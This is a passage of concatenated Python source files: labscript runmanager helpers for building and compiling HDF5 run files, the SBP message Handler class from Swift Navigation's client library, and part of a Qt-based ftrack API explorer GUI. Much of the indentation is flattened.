given is simply the sequence_id with increasing integers appended."""
basename = os.path.join(output_folder, sequence_id)
nruns = len(shots)
ndigits = int(np.ceil(np.log10(nruns)))
if shuffle:
random.shuffle(shots)
for i, shot_globals in enumerate(shots):
runfilename = ('%s_%0' + str(ndigits) + 'd.h5') % (basename, i)
make_single_run_file(runfilename, sequence_globals, shot_globals, sequence_id, i, nruns)
yield runfilename
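# Illustrative sketch (not part of the original module): make_run_files returns a
# generator, so each run file is only written when its element is consumed. The
# output folder and script name below are hypothetical.
def _example_make_run_files(sequence_globals, shots):
    sequence_id = generate_sequence_id('my_experiment.py')
    run_files = make_run_files('/tmp/shots', sequence_globals, shots, sequence_id)
    for path in run_files:
        # One .h5 file is created per iteration; stop early and the rest are
        # never written.
        print(path)
    # Alternatively, list(run_files) forces creation of every file up front.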
def make_single_run_file(filename, sequenceglobals, runglobals, sequence_id, run_no, n_runs):
"""Does what it says. runglobals is a dict of this run's globals,
the format being the same as that of one element of the list returned
by expand_globals. sequence_globals is a nested dictionary of the
type returned by get_globals. Every run file needs a sequence ID,
generate one with generate_sequence_id. This doesn't have to match
    the filename of the run file you end up using, though it usually does
(exceptions being things like connection tables). run_no and n_runs
must be provided, if this run file is part of a sequence, then they
should reflect how many run files are being generated which share
this sequence_id."""
with h5py.File(filename, 'w') as f:
f.attrs['sequence_id'] = sequence_id
f.attrs['run number'] = run_no
f.attrs['n_runs'] = n_runs
f.create_group('globals')
if sequenceglobals is not None:
for groupname, groupvars in sequenceglobals.items():
group = f['globals'].create_group(groupname)
unitsgroup = group.create_group('units')
expansiongroup = group.create_group('expansion')
for name, (value, units, expansion) in groupvars.items():
group.attrs[name] = value
unitsgroup.attrs[name] = units
expansiongroup.attrs[name] = expansion
for name, value in runglobals.items():
if value is None:
# Store it as a null object reference:
value = h5py.Reference()
try:
f['globals'].attrs[name] = value
except Exception as e:
message = ('Global %s cannot be saved as an hdf5 attribute. ' % name +
'Globals can only have relatively simple datatypes, with no nested structures. ' +
'Original error was:\n' +
'%s: %s' % (e.__class__.__name__, e.message if PY2 else str(e)))
raise ValueError(message)
def make_run_file_from_globals_files(labscript_file, globals_files, output_path):
"""Creates a run file output_path, using all the globals from
globals_files. Uses labscript_file only to generate a sequence ID"""
groups = get_all_groups(globals_files)
sequence_globals = get_globals(groups)
evaled_globals, global_hierarchy, expansions = evaluate_globals(sequence_globals)
shots = expand_globals(sequence_globals, evaled_globals)
if len(shots) > 1:
scanning_globals = []
for global_name in expansions:
if expansions[global_name]:
scanning_globals.append(global_name)
raise ValueError('Cannot compile to a single run file: The following globals are a sequence: ' +
', '.join(scanning_globals))
sequence_id = generate_sequence_id(labscript_file)
make_single_run_file(output_path, sequence_globals, shots[0], sequence_id, 1, 1)
def compile_labscript(labscript_file, run_file):
"""Compiles labscript_file with the run file, returning
    the process's return code, stdout and stderr."""
proc = subprocess.Popen([sys.executable, labscript_file, run_file], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = proc.communicate()
return proc.returncode, stdout, stderr
def compile_labscript_with_globals_files(labscript_file, globals_files, output_path):
"""Creates a run file output_path, using all the globals from
globals_files. Compiles labscript_file with the run file, returning
    the process's return code, stdout and stderr."""
make_run_file_from_globals_files(labscript_file, globals_files, output_path)
returncode, stdout, stderr = compile_labscript(labscript_file, output_path)
return returncode, stdout, stderr
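# Illustrative sketch (not part of the original module): compiling a single run
# file straight from globals files. The script name and paths are hypothetical.
def _example_compile_single_shot():
    returncode, stdout, stderr = compile_labscript_with_globals_files(
        'my_experiment.py', ['/experiment/globals.h5'], '/tmp/run_file.h5')
    if returncode != 0:
        # stdout/stderr are bytes, as returned by subprocess.Popen.communicate()
        print(stderr.decode())
    return returncode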
def compile_labscript_async(labscript_file, run_file, stream_port, done_callback):
"""Compiles labscript_file with run_file. This function is designed
to be called in a thread. The stdout and stderr from the compilation
will be shoveled into stream_port via zmq push as it spews forth, and
when compilation is complete, done_callback will be called with a
boolean argument indicating success."""
compiler_path = os.path.join(os.path.dirname(__file__), 'batch_compiler.py')
to_child, from_child, child = zprocess.subprocess_with_queues(compiler_path, stream_port)
to_child.put(['compile', [labscript_file, run_file]])
while True:
signal, data = from_child.get()
if signal == 'done':
success = data
to_child.put(['quit', None])
child.communicate()
done_callback(success)
break
else:
raise RuntimeError((signal, data))
def compile_multishot_async(labscript_file, run_files, stream_port, done_callback):
"""Compiles labscript_file with run_files. This function is designed
to be called in a thread. The stdout and stderr from the compilation
will be shoveled into stream_port via zmq push as it spews forth,
and when each compilation is complete, done_callback will be called
with a boolean argument indicating success. Compilation will stop
after the first failure."""
compiler_path = os.path.join(os.path.dirname(__file__), 'batch_compiler.py')
to_child, from_child, child = zprocess.subprocess_with_queues(compiler_path, stream_port)
try:
for run_file in run_files:
to_child.put(['compile', [labscript_file, run_file]])
while True:
signal, data = from_child.get()
if signal == 'done':
success = data
done_callback(data)
break
if not success:
break
except Exception:
error = traceback.format_exc()
zprocess.zmq_push_multipart(stream_port, data=[b'stderr', error.encode('utf-8')])
to_child.put(['quit', None])
child.communicate()
raise
to_child.put(['quit', None])
child.communicate()
def compile_labscript_with_globals_files_async(labscript_file, globals_files, output_path, stream_port, done_callback):
"""Same as compile_labscript_with_globals_files, except it launches
a thread to do the work and does not return anything. Instead,
stderr and stdout will be put to stream_port via zmq push in
the multipart message format ['stdout','hello, world\n'] etc. When
compilation is finished, the function done_callback will be called
    with a boolean argument indicating success or failure."""
try:
make_run_file_from_globals_files(labscript_file, globals_files, output_path)
thread = threading.Thread(
target=compile_labscript_async, args=[labscript_file, output_path, stream_port, done_callback])
thread.daemon = True
thread.start()
except Exception:
error = traceback.format_exc()
zprocess.zmq_push_multipart(stream_port, data=[b'stderr', error.encode('utf-8')])
t = threading.Thread(target=done_callback, args=(False,))
t.daemon = True
t.start()
def get_shot_globals(filepath):
"""Returns the evaluated globals for a shot, for use by labscript or lyse.
Simple dictionary access as in dict(h5py.File(filepath).attrs) would be fine
except we want to apply some hacks, so it's best to do that in one place."""
params = {}
with h5py.File(filepath, 'r') as f:
for name, value in f['globals'].attrs.items():
# Convert numpy bools to normal bools:
if isinstance(value, np.bool_):
value = bool(value)
# Convert null HDF references to None:
if isinstance(value, h5py.Reference) and not value:
value = None
# Convert numpy strings to Python ones.
# DEPRECATED, for backward compat with old files.
if isinstance(value, np.str_):
value = str(value)
if isinstance(value, bytes):
value = value.decode()
params[name] = value
return params
def dict_diff(dict1, dict2):
"""Return the difference between two dictionaries as a dictionary of key: [val1, val2] pairs.
Keys unique to either dictionary are included as key: [val1, '-'] or key: ['-', val2]."""
diff_keys = []
common_keys = np.intersect1d(list(dict1.keys()), list(dict2.keys()))
for key in common_keys:
if np.iterable(dict1[key]) or np.iterable(dict2[key]):
if not np.array_equal(dict1[key], dict2[key]):
diff_keys.append(key)
else:
if dict1[key] != dict2[key]:
diff_keys.append(key)
dict1_unique = [key for key in dict1.keys() if key not in common_keys]
dict2_unique = [key for key in dict2.keys() if key not in common_keys]
diff = {}
for key in diff_keys:
diff[key] = [dict1[key], dict2[key]]
for key in dict1_unique:
diff[key] = [dict1[key], '-']
for key in dict2_unique:
diff[key] = ['-', dict2[key]]
return diff
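# Illustrative sketch (not part of the original module): keys present in both
# dicts appear as [val1, val2]; keys unique to one side are padded with '-'.
def _example_dict_diff():
    old = {'freq': 80.0, 'amp': 0.5, 'shutter': True}
    new = {'freq': 80.0, 'amp': 0.7, 'gate_time': 0.1}
    return dict_diff(old, new)
    # -> {'amp': [0.5, 0.7], 'shutter': [True, '-'], 'gate_time': ['-', 0.1]}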
def remove_comments_and_tokenify(line):
"""Removed EOL comments from a line, leaving it otherwise intact,
and returns it. Also returns the raw tokens for the line, allowing
comparisons between lines to be made without being sensitive to
whitespace."""
import tokenize
if PY2:
import StringIO as io
else:
import io
result_expression = ''
result_tokens = []
error_encountered = False
# This never fails because it produces a generator, syntax errors
# come out when looping over it:
tokens = tokenize.generate_tokens(io.StringIO(line).readline)
try:
for token_type, token_value, (_, start), (_, end), _ in tokens:
if token_type == tokenize.COMMENT and not error_encountered:
break
if token_type == tokenize.ERRORTOKEN:
error_encountered = True
result_expression = result_expression.ljust(start)
result_expression += token_value
if token_value:
result_tokens.append(token_value)
except tokenize.TokenError:
# Means EOF was reached without closing brackets or something.
# We don't care, return what we've got.
pass
return result_expression, result_tokens
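# Illustrative sketch (not part of the original module): the returned token lists
# let two expressions be compared while ignoring whitespace and trailing comments.
def _example_tokenify():
    a, a_tokens = remove_comments_and_tokenify('2*pi * 80e6  # trap frequency')
    b, b_tokens = remove_comments_and_tokenify('2 * pi*80e6')
    # a_tokens == b_tokens is expected to be True: only whitespace and the
    # comment differ between the two lines.
    return a_tokens == b_tokens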
def flatten_globals(sequence_globals, evaluated=False):
"""Flattens the data structure of the globals. If evaluated=False,
saves only the value expression string of the global, not the
units or expansion."""
flattened_sequence_globals = {}
for globals_group in sequence_globals.values():
for name, value in globals_group.items():
if evaluated:
flattened_sequence_globals[name] = value
else:
value_expression, units, expansion = value
flattened_sequence_globals[name] = value_expression
return flattened_sequence_globals
def globals_diff_groups(active_groups, other_groups, max_cols=1000, return_string=True):
"""Given two sets of globals groups, perform a diff of the raw
and evaluated globals."""
our_sequence_globals = get_globals(active_groups)
other_sequence_globals = get_globals(other_groups)
# evaluate globals
our_evaluated_sequence_globals, _, _ = evaluate_globals(our_sequence_globals, raise_exceptions=False)
other_evaluated_sequence_globals, _, _ = evaluate_globals(other_sequence_globals, raise_exceptions=False)
# flatten globals dictionaries
our_globals = flatten_globals(our_sequence_globals, evaluated=False)
other_globals = flatten_globals(other_sequence_globals, evaluated=False)
our_evaluated_globals = flatten_globals(our_evaluated_sequence_globals, evaluated=True)
other_evaluated_globals = flatten_globals(other_evaluated_sequence_globals, evaluated=True)
# diff the *evaluated* globals
value_differences = dict_diff(other_evaluated_globals, our_evaluated_globals)
# We are interested only in displaying globals where *both* the
# evaluated global *and* its unevaluated expression (ignoring comments
# and whitespace) differ. This will minimise false positives where a
# slight change in an expression still leads to the same value, or
# where an object has a poorly defined equality operator that returns
# False even when the two objects are identical.
filtered_differences = {}
for name, (other_value, our_value) in value_differences.items():
our_expression = our_globals.get(name, '-')
other_expression = other_globals.get(name, '-')
# Strip comments, get tokens so we can diff without being sensitive to comments or whitespace:
our_expression, our_tokens = remove_comments_and_tokenify(our_expression)
other_expression, other_tokens = remove_comments_and_tokenify(other_expression)
if our_tokens != other_tokens:
filtered_differences[name] = [repr(other_value), repr(our_value), other_expression, our_expression]
if filtered_differences:
import pandas as pd
df = pd.DataFrame.from_dict(filtered_differences, 'index')
df = df.sort_index()
df.columns = ['Prev (Eval)', 'Current (Eval)', 'Prev (Raw)', 'Current (Raw)']
df_string = df.to_string(max_cols=max_cols)
payload = df_string + '\n\n'
else:
payload = 'Evaluated globals are identical to those of selected file.\n'
if return_string:
return payload
else:
print(payload)
return df
def globals_diff_shots(file1, file2, max_cols=100):
# Get file's globals groups
active_groups = get_all_groups(file1)
# Get other file's globals groups
other_groups = get_all_groups(file2)
print('Globals diff between:\n%s\n%s\n\n' % (file1, file2))
return globals_diff_groups(active_groups, other_groups, max_cols=max_cols, return_string=False)
|
handler.py
|
# Copyright (C) 2015 Swift Navigation Inc.
# Contact: https://support.swiftnav.com
#
# This source is subject to the license found in the file 'LICENSE' which must
# be be distributed together with this source. All other rights reserved.
#
# THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND,
# EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A PARTICULAR PURPOSE.
"""
The :mod:`sbp.client.handler` module contains classes related to
SBP message handling.
"""
import warnings
import collections
import threading
import weakref
import six
from six.moves.queue import Queue
try:
from typing import Optional # noqa
except ImportError:
pass
class Handler(object):
"""
Handler
The :class:`Handler` class provides an interface for connecting handlers
to a driver providing SBP messages. Also provides queued and filtered
iterators for synchronous, blocking use in other threads.
Parameters
----------
source : Iterable of tuple(SBP message, {'time':'ISO 8601 str'})
Stream of SBP messages
autostart : Boolean
If false, start() shall be skipped when entering context scope and it
should be explicitly called by the parent. This will prevent losing
    messages in cases where the receive thread would otherwise be started before
consumers are ready.
"""
def __init__(self, source, autostart=True):
self._autostart = autostart
self._source = source
self._callbacks = collections.defaultdict(set)
self._receive_thread = threading.Thread(
target=self._recv_thread, name="Handler")
self._receive_thread.daemon = True
self._sinks = [] # This is a list of weakrefs to upstream iterators
self._dead = False
self._exception = None
self._write_lock = threading.Lock()
def _recv_thread(self):
"""
Internal thread to iterate over source messages and dispatch callbacks.
"""
def gen_messages():
for msg, metadata in self._source:
if msg.msg_type:
yield (msg, metadata)
messages = gen_messages()
while True:
msg_and_metadata = None
try:
msg_and_metadata = next(messages, None)
except Exception as exc:
self._exception = exc
break
if msg_and_metadata is None:
break
msg, metadata = msg_and_metadata
self._call(msg, **metadata)
# Break any upstream iterators
for sink in self._sinks:
i = sink()
if i is not None:
i.breakiter(self._exception)
self._dead = True
def __enter__(self):
if self._autostart:
self.start()
return self
def __exit__(self, *args):
self.stop()
# This exception is raised when a message is dispatched to a garbage
# collected upstream iterator.
class _DeadCallbackException(Exception):
pass
def filter(self, msg_type=None, maxsize=0):
"""
Get a filtered iterator of messages for synchronous, blocking use in
another thread.
"""
if self._dead:
return iter(())
iterator = Handler._SBPQueueIterator(maxsize)
    # We use a weakref so that the iterator may be garbage collected if its
# consumer no longer has a reference.
ref = weakref.ref(iterator)
self._sinks.append(ref)
def feediter(msg, **metadata):
i = ref()
if i is not None:
i(msg, **metadata)
else:
raise Handler._DeadCallbackException
self.add_callback(feediter, msg_type)
return iterator
def __iter__(self):
"""
Get a queued iterator that will provide the same unfiltered messages
read from the source iterator.
"""
return self.filter()
def _to_iter(self, maybe_iter):
try:
return iter(maybe_iter)
except TypeError:
return None
def add_callback(self, callback, msg_type=None):
"""
Add per message type or global callback.
Parameters
----------
callback : fn
Callback function
msg_type : int | iterable
Message type to register callback against. Default `None` means global callback.
Iterable type adds the callback to all the message types.
"""
cb_keys = self._to_iter(msg_type)
if cb_keys is not None:
for msg_type_ in cb_keys:
self._callbacks[msg_type_].add(callback)
else:
self._callbacks[msg_type].add(callback)
def remove_callback(self, callback, msg_type=None):
"""
    Remove per message type or global callback.
Parameters
----------
callback : fn
Callback function
msg_type : int | iterable
Message type to remove callback from. Default `None` means global callback.
Iterable type removes the callback from all the message types.
"""
if msg_type is None:
msg_type = self._callbacks.keys()
cb_keys = self._to_iter(msg_type)
if cb_keys is not None:
for msg_type_ in cb_keys:
try:
self._callbacks[msg_type_].remove(callback)
except KeyError:
pass
else:
self._callbacks[msg_type].remove(callback)
def _gc_dead_sinks(self):
"""
Remove any dead weakrefs.
"""
deadsinks = []
for i in self._sinks:
if i() is None:
deadsinks.append(i)
for i in deadsinks:
self._sinks.remove(i)
def _get_callbacks(self, msg_type):
"""
Return all callbacks (global and per message type) for a message type.
Parameters
----------
msg_type : int
Message type to return callbacks for.
"""
return self._callbacks[None] | self._callbacks[msg_type]
def _call(self, msg, **metadata):
"""
Process message with all callbacks (global and per message type).
"""
if msg.msg_type:
for callback in self._get_callbacks(msg.msg_type):
try:
callback(msg, **metadata)
except Handler._DeadCallbackException:
# The callback was an upstream iterator that has been garbage
# collected. Remove it from our internal structures.
self.remove_callback(callback)
self._gc_dead_sinks()
except SystemExit:
raise
except:
import traceback
traceback.print_exc()
def start(self):
"""
Start processing SBP messages with handlers.
"""
self._receive_thread.start()
def stop(self):
"""
Stop processing SBP messages.
"""
try:
self._source.breakiter()
self._receive_thread.join(0.1)
except Exception as exc:
warnings.warn("Handler stop error: %s" % (exc,))
def join(self, timeout=None):
self._receive_thread.join(timeout)
def is_alive(self):
"""
    Return whether the receive thread is alive.
"""
return self._receive_thread.is_alive()
def wait(self, msg_type, timeout=1.0):
"""
    Wait for an SBP message.
Parameters
----------
msg_type : int
SBP message type.
timeout : float
Waiting period
"""
event = threading.Event()
payload = {'data': None}
def cb(sbp_msg, **metadata):
payload['data'] = sbp_msg
event.set()
self.add_callback(cb, msg_type)
event.wait(timeout)
self.remove_callback(cb, msg_type)
return payload['data']
def wait_callback(self, callback, msg_type=None, timeout=1.0):
"""
    Wait for an SBP message with a callback.
Parameters
----------
callback : fn
Callback function
msg_type : int | iterable
Message type to register callback against. Default `None` means global callback.
Iterable type adds the callback to all the message types.
timeout : float
Waiting period
"""
event = threading.Event()
def cb(msg, **metadata):
callback(msg, **metadata)
event.set()
self.add_callback(cb, msg_type)
event.wait(timeout)
self.remove_callback(cb, msg_type)
def __call__(self, *msgs, **metadata):
"""
Pass messages to the `source` to be consumed. Typically this means
the messages will be framed and transmitted via whatever transport
layer is currently active.
Parameters
----------
msgs : SBP messages
SBP messages to send.
metadata : dict
Metadata for this batch of messages, passed to the `source`.
"""
with self._write_lock:
self._source(*msgs, **metadata)
class _SBPQueueIterator(six.Iterator):
"""
Class for upstream iterators. Implements callable interface for adding
messages into the queue, and iterable interface for getting them out.
"""
def __init__(self, maxsize):
self._queue = Queue(maxsize)
self._broken = False
self._exception = None # type: Optional[Exception]
def __iter__(self):
return self
def __call__(self, msg, **metadata):
self._queue.put((msg, metadata), False)
def breakiter(self, exc=None):
self._broken = True
self._exception = exc
self._queue.put(None, True, 1.0)
def __next__(self):
if self._broken and self._queue.empty():
raise StopIteration
m = self._queue.get(True)
if self._broken and m is None:
if self._exception is not None:
raise self._exception
raise StopIteration
return m
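# Illustrative sketch (not part of the original module): a typical blocking consumer
# built on Handler.filter(). PySerialDriver, Framer and SBP_MSG_POS_LLH are assumed
# to be available from the wider sbp package; the serial port and baud rate are
# hypothetical.
def _example_read_positions():
    from sbp.client import Framer
    from sbp.client.drivers.pyserial_driver import PySerialDriver
    from sbp.navigation import SBP_MSG_POS_LLH
    with PySerialDriver('/dev/ttyUSB0', baud=115200) as driver:
        with Handler(Framer(driver.read, driver.write)) as handler:
            # filter() returns a queued iterator that blocks until matching
            # messages arrive on the receive thread.
            for msg, metadata in handler.filter(SBP_MSG_POS_LLH):
                print(msg.lat, msg.lon, msg.height)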
|
ftrack_api_explorer.py
|
import os
import requests
import time
import traceback
import uuid
from collections import defaultdict
from functools import wraps
from getpass import getuser
from threading import Thread
import ftrack_api
from Qt import QtCore, QtGui, QtWidgets
from vfxwindow import VFXWindow
_ID_REMAP = {}
def remapID(entityID):
"""Remap any IDs to avoid exposing them in screenshots."""
try:
uuid.UUID(entityID)
except ValueError:
return entityID
try:
return _ID_REMAP[entityID]
except KeyError:
newID = _ID_REMAP[entityID] = str(uuid.uuid4())
return newID
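# Illustrative sketch (not part of the original module): the same source ID always
# maps to the same replacement UUID, while non-UUID strings pass through unchanged.
def _exampleRemapID():
    first = remapID('11111111-2222-3333-4444-555555555555')
    second = remapID('11111111-2222-3333-4444-555555555555')
    assert first == second  # the cached mapping is reused
    assert remapID('not-a-uuid') == 'not-a-uuid'  # invalid UUIDs are returned as-is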
def errorHandler(func):
"""Catch any exception and emit it as a signal."""
@wraps(func)
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
try:
error = str(e)
except KeyError:
if not isinstance(e, ftrack_api.exception.ServerError):
raise
error = 'Server reported error: An unknown server error occurred.'
# Handle ftrack server errors
if isinstance(e, ftrack_api.exception.ServerError):
error = error[23:] # Remove "Server reported error"
if 'ftrack-user' in error:
try:
del os.environ['FTRACK_API_USER']
except KeyError:
pass
if 'ftrack-api-key' in error:
try:
del os.environ['FTRACK_API_KEY']
except KeyError:
pass
if isinstance(e, requests.exceptions.ConnectionError):
try:
del os.environ['FTRACK_SERVER']
except KeyError:
pass
# Send the error back to the GUI if possible
try:
self.errorInThread.emit(error, traceback.format_exc())
except RuntimeError:
pass
else:
raise
return wrapper
def deferred(func):
"""Run a function in a thread."""
def wrapper(*args, **kwargs):
thread = Thread(target=func, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
return thread
return wrapper
def entityRepr(entityType, entityID=None, remapIDs=False):
"""Create a correct representation of an entity.
>>> project = session.query('Project').first()
>>> entityRepr(project)
Project(id='12345678')
>>> entityRepr(session.types['Project'], '12345678')
Project(id='12345678')
"""
if entityID is None:
entity, entityType = entityType, type(entityType)
primaryKeys = entityType.primary_key_attributes
if entityID is None:
entityID = [entity[k] for k in primaryKeys]
elif not isinstance(entityID, (list, tuple)):
entityID = [entityID]
# Generate an accurate representation of the entity
if remapIDs:
entityID = map(remapID, entityID)
args = ', '.join(f'{k}={v!r}' for k, v in zip(primaryKeys, entityID))
return f'{entityType.entity_type}({args})'
def isKeyLoaded(entity, key):
"""Determine if an entity has a key loaded."""
    attrStorage = getattr(entity, '_ftrack_attribute_storage', None)
if attrStorage is None or key not in attrStorage:
return False
return attrStorage[key]['remote'] != ftrack_api.symbol.NOT_SET
class BusyProgressBar(QtWidgets.QWidget):
"""Allow text to be displayed on a busy progress bar."""
def __init__(self, parent=None):
super().__init__(parent=parent)
grid = QtWidgets.QGridLayout()
grid.setContentsMargins(0, 0, 0, 0)
self.setLayout(grid)
self._progressBar = QtWidgets.QProgressBar()
self._progressBar.setRange(0, 0)
grid.addWidget(self._progressBar, 0, 0)
self._label = QtWidgets.QLabel('test')
self._label.setAlignment(QtCore.Qt.AlignCenter)
self._label.setStyleSheet('color:black')
grid.addWidget(self._label, 0, 0)
def progressBar(self):
return self._progressBar
def label(self):
return self._label
def setValue(self, value):
self._progressBar.setValue(value)
def setFormat(self, format):
self._label.setText(format)
class Placeholders(object):
"""Fake classes to use as placeholders.
The purpose of this is for the dummy items, so they can be replaced
once the parent item is expanded.
"""
class Collection(object):
pass
class KeyValueMappedCollectionProxy(object):
pass
class EntityCache(object):
"""Cache entity values."""
__slots__ = ('id',)
Cache = defaultdict(dict)
Entities = {}
Types = {}
def __init__(self, entity, remapIDs=False):
self.id = entityRepr(entity, remapIDs=remapIDs)
# Don't overwrite as it'll break if auto-populate is disabled
if self.id not in self.Entities:
self.Entities[self.id] = entity
def __getitem__(self, key):
return self.cache[key]
def __setitem__(self, key, value):
self.cache[key] = value
def __contains__(self, key):
return key in self.cache
@property
def cache(self):
return self.Cache[self.id]
@classmethod
def reset(cls):
"""Remove all cache."""
cls.Cache = defaultdict(dict)
@classmethod
def load(cls, entity, remapIDs=False):
"""Add an entity to cache."""
cache = cls(entity, remapIDs=remapIDs)
attributes = type(entity).attributes
for key in entity.keys():
if not isKeyLoaded(entity, key):
continue
cache[key] = entity[key]
attr = attributes.get(key)
if isinstance(attr, ftrack_api.attribute.ReferenceAttribute):
cls.load(entity[key])
elif isinstance(attr, ftrack_api.attribute.CollectionAttribute):
for child in entity[key]:
cls.load(child)
@classmethod
@errorHandler
def types(cls, session=None):
"""Cache the entity types to avoid opening more sessions."""
if not cls.Types:
print('Loading FTrack entity types...')
if session is not None:
cls.Types = session.types
else:
with ftrack_api.Session() as session:
cls.Types = session.types
return dict(cls.Types)
return dict(cls.Types)
@classmethod
def entity(cls, name):
"""Get an entity from its name or return None."""
return cls.Entities.get(name)
class QueryEdit(QtWidgets.QLineEdit):
"""Add a few features to the line edit widget."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.setPlaceholderText('Type custom query here...')
self._completerSet = False
def setupCompleter(self):
if self._completerSet:
return False
completer = QtWidgets.QCompleter()
completer.setCaseSensitivity(QtCore.Qt.CaseInsensitive)
self.setCompleter(completer)
model = QtCore.QStringListModel()
completer.setModel(model)
model.setStringList(sorted(EntityCache.types()))
self._completerSet = True
return True
def mousePressEvent(self, event):
super().mousePressEvent(event)
self.setupCompleter()
self.completer().complete()
def keyPressEvent(self, event):
super().keyPressEvent(event)
if self.setupCompleter():
self.completer().complete()
class FTrackExplorer(VFXWindow):
WindowID = 'ftrack-api-explorer'
WindowName = 'FTrack API Explorer'
VisitRole = QtCore.Qt.UserRole
DummyRole = QtCore.Qt.UserRole + 1
EntityPrimaryKeyRole = QtCore.Qt.UserRole + 2
EntityTypeRole = QtCore.Qt.UserRole + 3
EntityKeyRole = QtCore.Qt.UserRole + 4
AutoPopulateRole = QtCore.Qt.UserRole + 5
topLevelEntityAdded = QtCore.Signal()
entityLoading = QtCore.Signal(str, int)
errorInThread = QtCore.Signal(str, str)
def __init__(self, parent=None, **kwargs):
super().__init__(parent=parent, **kwargs)
self.setWindowPalette('Nuke', 12)
# Build menu
options = self.menuBar().addMenu('Options')
self._autoPopulate = QtWidgets.QAction('Enable auto-population')
self._autoPopulate.setCheckable(True)
self._autoPopulate.setChecked(True)
options.addAction(self._autoPopulate)
self._remapIDs = QtWidgets.QAction('Remap ID primary keys')
self._remapIDs.setCheckable(True)
self._remapIDs.setChecked(False)
options.addAction(self._remapIDs)
# Build layout
layout = QtWidgets.QVBoxLayout()
widget = QtWidgets.QWidget()
widget.setLayout(layout)
self.setCentralWidget(widget)
queryLayout = QtWidgets.QHBoxLayout()
layout.addLayout(queryLayout)
queryLabel = QtWidgets.QLabel('Query:')
queryLayout.addWidget(queryLabel)
self._queryText = QueryEdit()
queryLayout.addWidget(self._queryText)
queryFirst = QtWidgets.QPushButton('Get First')
queryLayout.addWidget(queryFirst)
queryAll = QtWidgets.QPushButton('Get All')
queryLayout.addWidget(queryAll)
self._entityData = QtWidgets.QTreeView()
layout.addWidget(self._entityData)
entityDataModel = QtGui.QStandardItemModel()
entityDataModel.setHorizontalHeaderLabels(('Key', 'Value', 'Type'))
self._entityData.setModel(entityDataModel)
self._progressArea = QtWidgets.QVBoxLayout()
self._progressArea.setContentsMargins(0, 0, 0, 0)
layout.addLayout(self._progressArea)
footer = QtWidgets.QHBoxLayout()
layout.addLayout(footer)
footer.addStretch()
clear = QtWidgets.QPushButton('Clear')
footer.addWidget(clear)
footer.addStretch()
# Signals
self._entityData.expanded.connect(self.populateChildren)
clear.clicked.connect(self.clear)
self.topLevelEntityAdded.connect(self.autoResizeColumns)
queryAll.clicked.connect(self.executeAll)
queryFirst.clicked.connect(self.executeFirst)
self._queryCounter = 0
self._entityProgress = {}
self.entityLoading.connect(self.updateEntityProgress)
self.errorInThread.connect(self.errorPopup)
# Cache environment info
# This is so a failed connection can delete a key while still
# remembering the original value
try:
self._ftrack_api_user = os.environ['FTRACK_API_USER']
except KeyError:
self._ftrack_api_user = getuser()
try:
self._ftrack_api_key = os.environ['FTRACK_API_KEY']
except KeyError:
self._ftrack_api_key = ''
try:
self._ftrack_server = os.environ['FTRACK_SERVER']
except KeyError:
self._ftrack_server = 'https://company.ftrackapp.com'
def errorPopup(self, error, exc):
"""Allow error popups to be triggered from threads."""
msg = QtWidgets.QMessageBox(self)
msg.setWindowTitle('Error')
msg.setText(error)
msg.setStandardButtons(QtWidgets.QMessageBox.Ok)
msg.setDetailedText(exc)
msg.exec_()
def autoPopulate(self):
"""Determine if auto population is allowed."""
return self._autoPopulate.isChecked()
def remapIDs(self):
"""Determine if remapping IDs is required."""
return self._remapIDs.isChecked()
@QtCore.Slot(str, int)
def updateEntityProgress(self, entity, progress):
# Reuse an existing progress bar
if entity in self._entityProgress:
progressBar = self._entityProgress[entity][0]
# Create a new progress bar
else:
if progress < 0:
progressBar = BusyProgressBar()
else:
progressBar = QtWidgets.QProgressBar()
progressBar.setRange(0, 100)
progressBar.setTextVisible(True)
progressBar.setFormat(f'Loading {entity}...')
self._progressArea.addWidget(progressBar)
self._entityProgress[entity] = [progressBar, progress]
progressBar.setValue(progress)
# Delete a finished progress bar
if progress == 100:
widget = self._entityProgress.pop(entity)[0]
widget.deleteLater()
else:
self._entityProgress[entity][1] = progress
@deferred
@errorHandler
def executeAll(self):
"""Get all the results of the query."""
query = self._queryText.text()
if not query:
return
self.checkCredentials()
print(f'Executing {query!r}...')
self._queryCounter += 1
progressName = f'query {self._queryCounter} ({query})'
self.entityLoading.emit(progressName, -1)
with ftrack_api.Session() as session:
try:
for entity in session.query(query):
self._loadEntity(entity)
time.sleep(0.01) # Avoid blocking GUI updates
except (KeyError, ftrack_api.exception.ServerError):
print(f'Invalid query: {query!r}')
self.entityLoading.emit(progressName, 100)
@deferred
@errorHandler
def executeFirst(self):
"""Get the first result of the query."""
query = self._queryText.text()
if not query:
return
self.checkCredentials()
print(f'Executing {query!r}...')
self._queryCounter += 1
progressName = f'query {self._queryCounter}: ({query})'
self.entityLoading.emit(progressName, 0)
with ftrack_api.Session() as session:
try:
entity = session.query(query).first()
except (KeyError, ftrack_api.exception.ServerError):
print(f'Invalid query: {query!r}')
else:
if entity is not None:
self._loadEntity(entity)
self.entityLoading.emit(progressName, 100)
@QtCore.Slot()
def entityTypeChanged(self):
"""Reset the Type ID text."""
self._typeID.setText('')
@QtCore.Slot()
def clear(self):
"""Remove all the data."""
self._entityData.model().removeRows(0, self._entityData.model().rowCount())
EntityCache.reset()
@QtCore.Slot(QtCore.QModelIndex)
def populateChildren(self, index=None):
"""Load all child items when an entity is expanded."""
model = self._entityData.model()
# Check if the items have already been populated
if model.data(index, self.VisitRole) is not None:
populated = model.data(index, self.AutoPopulateRole)
# Load the remaining entity keys if required
# The EntityKeyRole check is to avoid reloading collections
if not populated and self.autoPopulate() and not model.data(index, self.EntityKeyRole):
parentType = model.data(index, self.EntityTypeRole)
parentPrimaryKeys = model.data(index, self.EntityPrimaryKeyRole).split(';')
item = model.itemFromIndex(index)
loaded = [item.child(row).text() for row in range(item.rowCount())]
self.loadEntity(parentType, parentPrimaryKeys, parent=item, _loaded=loaded)
model.setData(index, True, self.AutoPopulateRole)
# Mark the item as visited
elif model.data(index, self.DummyRole) is not None:
model.setData(index, True, self.VisitRole)
model.setData(index, self.autoPopulate(), self.AutoPopulateRole)
item = model.itemFromIndex(index)
# Remove the dummy item
